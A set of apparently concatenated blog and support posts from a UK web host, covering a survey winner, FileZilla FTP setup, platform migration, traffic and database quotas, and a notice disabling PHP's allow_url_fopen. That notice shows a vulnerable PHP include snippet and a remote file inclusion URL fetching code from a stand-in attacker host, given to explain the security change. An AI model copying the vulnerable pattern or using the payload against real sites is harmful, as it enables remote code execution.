All the team at Pipe Ten just would like to say a big thank you to all of our customers that filled in our recent survey.

The turnout was very impressive and we got some great feedback which included both constructive criticism as well as compliments. As much as we thoroughly enjoyed reading all the lovely things you had to say about us we also got some great ideas on how to improve our services. You may have noticed that some of the ideas have already been implemented and others you will see in the near future.

The lucky winner for providing the most in depth and valuable responses was Dan Pike from Go Massif who chose one of our dedicated Windows servers as his prize.

We try to run our customer surveys regularly so don’t worry if you didn’t get chance to contribute on this occasion, there is always next time. As always, we still welcome any feedback you want to send us via the contact methods.

Download and install FileZilla.

Locate the FTP details you’ll need to connect to the server. These are:

FTP Username (This can be different or shorter than your control panel username).

FTP Password (This is by default the same as your control panel password but if modified will be different).

FTP Host name (This is the server/host name on which your account resides).

The main FTP account details were sent with your welcome email after signup but you can also find these details from within the control panel by navigating to ‘FTP/User Account’ > ‘FTP User’ as shown below. You can also reset your FTP Password from the same location or by following these FTP password reset instructions.

Enter this information into the quick connect tool bar, the server port box can be left blank as the default port is 21.

After a successful connection a list of files and directories on the server will appear on the right hand side of the main window.

Your local computer files are located on the left side of the main window.

You can now upload and download using FileZilla and there are three different methods to choose from:

Transfer a single file by double-clicking the file in the left window pane and it will then enter the transfer queue to start uploading automatically.

Transfer single/multiple files or directories by selecting the file(s)/directory(s) and right-click them, you can then click on upload/download in the pop-up menu.

Transfer files using drag and drop between the left and right hand window panes. Simply select the file(s) or directory(s) and drop them on the other side.

Once you have finished your session click on ‘Server’ then ‘Disconnect’ in the top menu or press Ctrl+D.

Note: This is purely for the “quick-connect” process. For full setup of FileZilla, support with FileZilla products or for more information please view the FileZilla FAQ page or the FileZilla homepage.

FTP sub-accounts can also be created to limit FTP users to specific directories and paths.

Brief: On Monday March 1st we will be changing a php.ini configuration option on all of our shared and reseller hosting servers which may affect your website code.

Shared servers impacted:

web10.pipeten.co.uk

dweb4.pipeten.co.uk

Currently most Shared and Reseller Linux servers run with the option allow_url_fopen=On. On March 1st we will be changing the option to allow_url_fopen=Off.

The reasons for this change and its impact are as follows…

With this option enabled, all of PHP’s file handling functions will accept a full URL as a parameter and will download that page and use it as a file. This is very convenient in a number of applications such as retrieving RSS feeds. Unfortunately it leads to unexpected results and serious security problems in many applications. For example in the following simple code…

$pagef = $_REQUEST["pagef"];
include ($pagef);

The programmer intends that the pagef request string will specify a file somewhere in the account to be included as part of the main page, to be called with a request like…

http://mydomain.com/display.php?pagef=footer.html

An attacker can create his own URL and exploit this page to download and execute his own code on your web site e.g.

http://mydomain.com/display.php?pagef=http://evil.info/exploit.txt

Expected Impact: By disabling the allow_url_fopen option, this attack vector is closed off while still allowing the intended function of such site code. The drawback is that other code which might for example use

readfile(“http://feeds.feedburner.com/DilbertDailyStrip”);

to retrieve a remote RSS feed will no longer work.

What you need to do: The supported alternative is Curl which is available to PHP on all of our servers. Many popular applications will automatically fall back on the Curl functions however you may need to upgrade to the latest version of your web application. The PHP documentation for the Curl functions is available at http://www.php.net/manual/en/ref.curl.php

There are a number of reasons you might want to switch hosting platforms/operating systems, sometimes you want to utilise the more advanced features and modules of PHP that are not available on Window and so need to switch to Linux or your new website is developed in .NET and thus you need a Windows package instead.

Their is no automated way to switch between platforms due to the underlying technologies, as such a new account is required in order to manually transfer your domains and data. To minimise any downtime during migration follow the steps below to test you site before making it live:

Signup for a new account.

Make sure you make a backup of all web, database and email content.

Login and create a test third level domain (eg. add the domain ‘testdomain.pipeten.co.uk’).

Upload you website files using either using the built in WebShell File Manager or a FTP client such as filezilla.

Upload any database required for the website.

Test your website is working correctly using the third level domain created in step #1.

Once ready to go live, remove your domain from the old account and add it to the new account using ‘Domain settings’ > ‘Add new domain’ > ‘Host existing domain’.

Login to Webshell or your FTP client again and rename the automatically created directory ‘yourdomain.com’ to ‘oldyourdomain.com’.

Still within Webshell or FTP, rename the directory ‘testdomain.pipeten.co.uk’ to your ‘yourdomain.com’.

Finally you will also need to recreate any mailboxes needed for ‘yourdomain.com’.

If moving multiple domains, simply repeat the steps above (to use the same third level domain just recreate the third level domain folder e.g. ‘testdomain.pipeten.co.uk’).

When you are happy that all domains are transferred across and everything has been setup correctly, you can request to close your old account.

These instructions for transferring a domain are only relevant if your domain is pointing at our nameservers and when transferring between two UK accounts. The transfer process will also differ slightly if you are using a dedicated IP address and/or SSL certificates.

For more information and any other questions on switching platforms please contact the support team using the usual methods.

When you reach 90% of your hosting packages designated traffic quota (also known as data transfer or bandwidth) you will receive an email to the primary account contact with the subject “Warning (Approaching resource limit)”.

The traffic quota consists of all traffic that is used under your hosting account which includes:

Inbound and outbound FTP data.

Inbound and outbound Email data.

Outbound website data (people downloading or viewing things from your website).

When you reach 100% of your traffic quota you will start to be billed for the traffic used above the inclusive traffic quota (commonly referred to as over-usage). The costs for over-usage can be found on the bottom of the compare packages page.

If you find you are often exceeding the inclusive traffic quota the first option to consider is to upgrade the hosting package which will almost always have more inclusive traffic in addition to increasing other inclusive resources as well. This can be done easily from within your control panel following a few simple instructions.

If you feel that an upgraded hosting package is not needed then you can continue on the current hosting package and pay for over-usage. This method works well if it is expected on infrequent occasions. If you choose this option then you will continue to receive warning emails about being over-quota. In order to stop receiving over-quota emails with frequent over-usage you must manually increase your traffic quota for which you’ll be billed each month.

You can view a summary of you traffic on your ‘Quick Access’ screen by clicking the magnifying glass next to ‘Traffic Details’. From here you will be able to see if a particular domain has a larger amount of traffic to the website than others or if another domain receives a larger number of emails. An example is show below:

If you exceed your inclusive database quota then you will be charged over-usage on every MB above the inclusive database quota.

In order to stop receiving warning emails you must either:

1) Increase the inclusive storage of your database to beyond the current usage (at additional cost). Simple instructions on how to increase database storage can be found for MySQL and MSSQL.

or

2) Reduce the size of data stored in the database (through archiving or deletion). MSSQL users should be aware that the transaction logs are shrunk nightly.
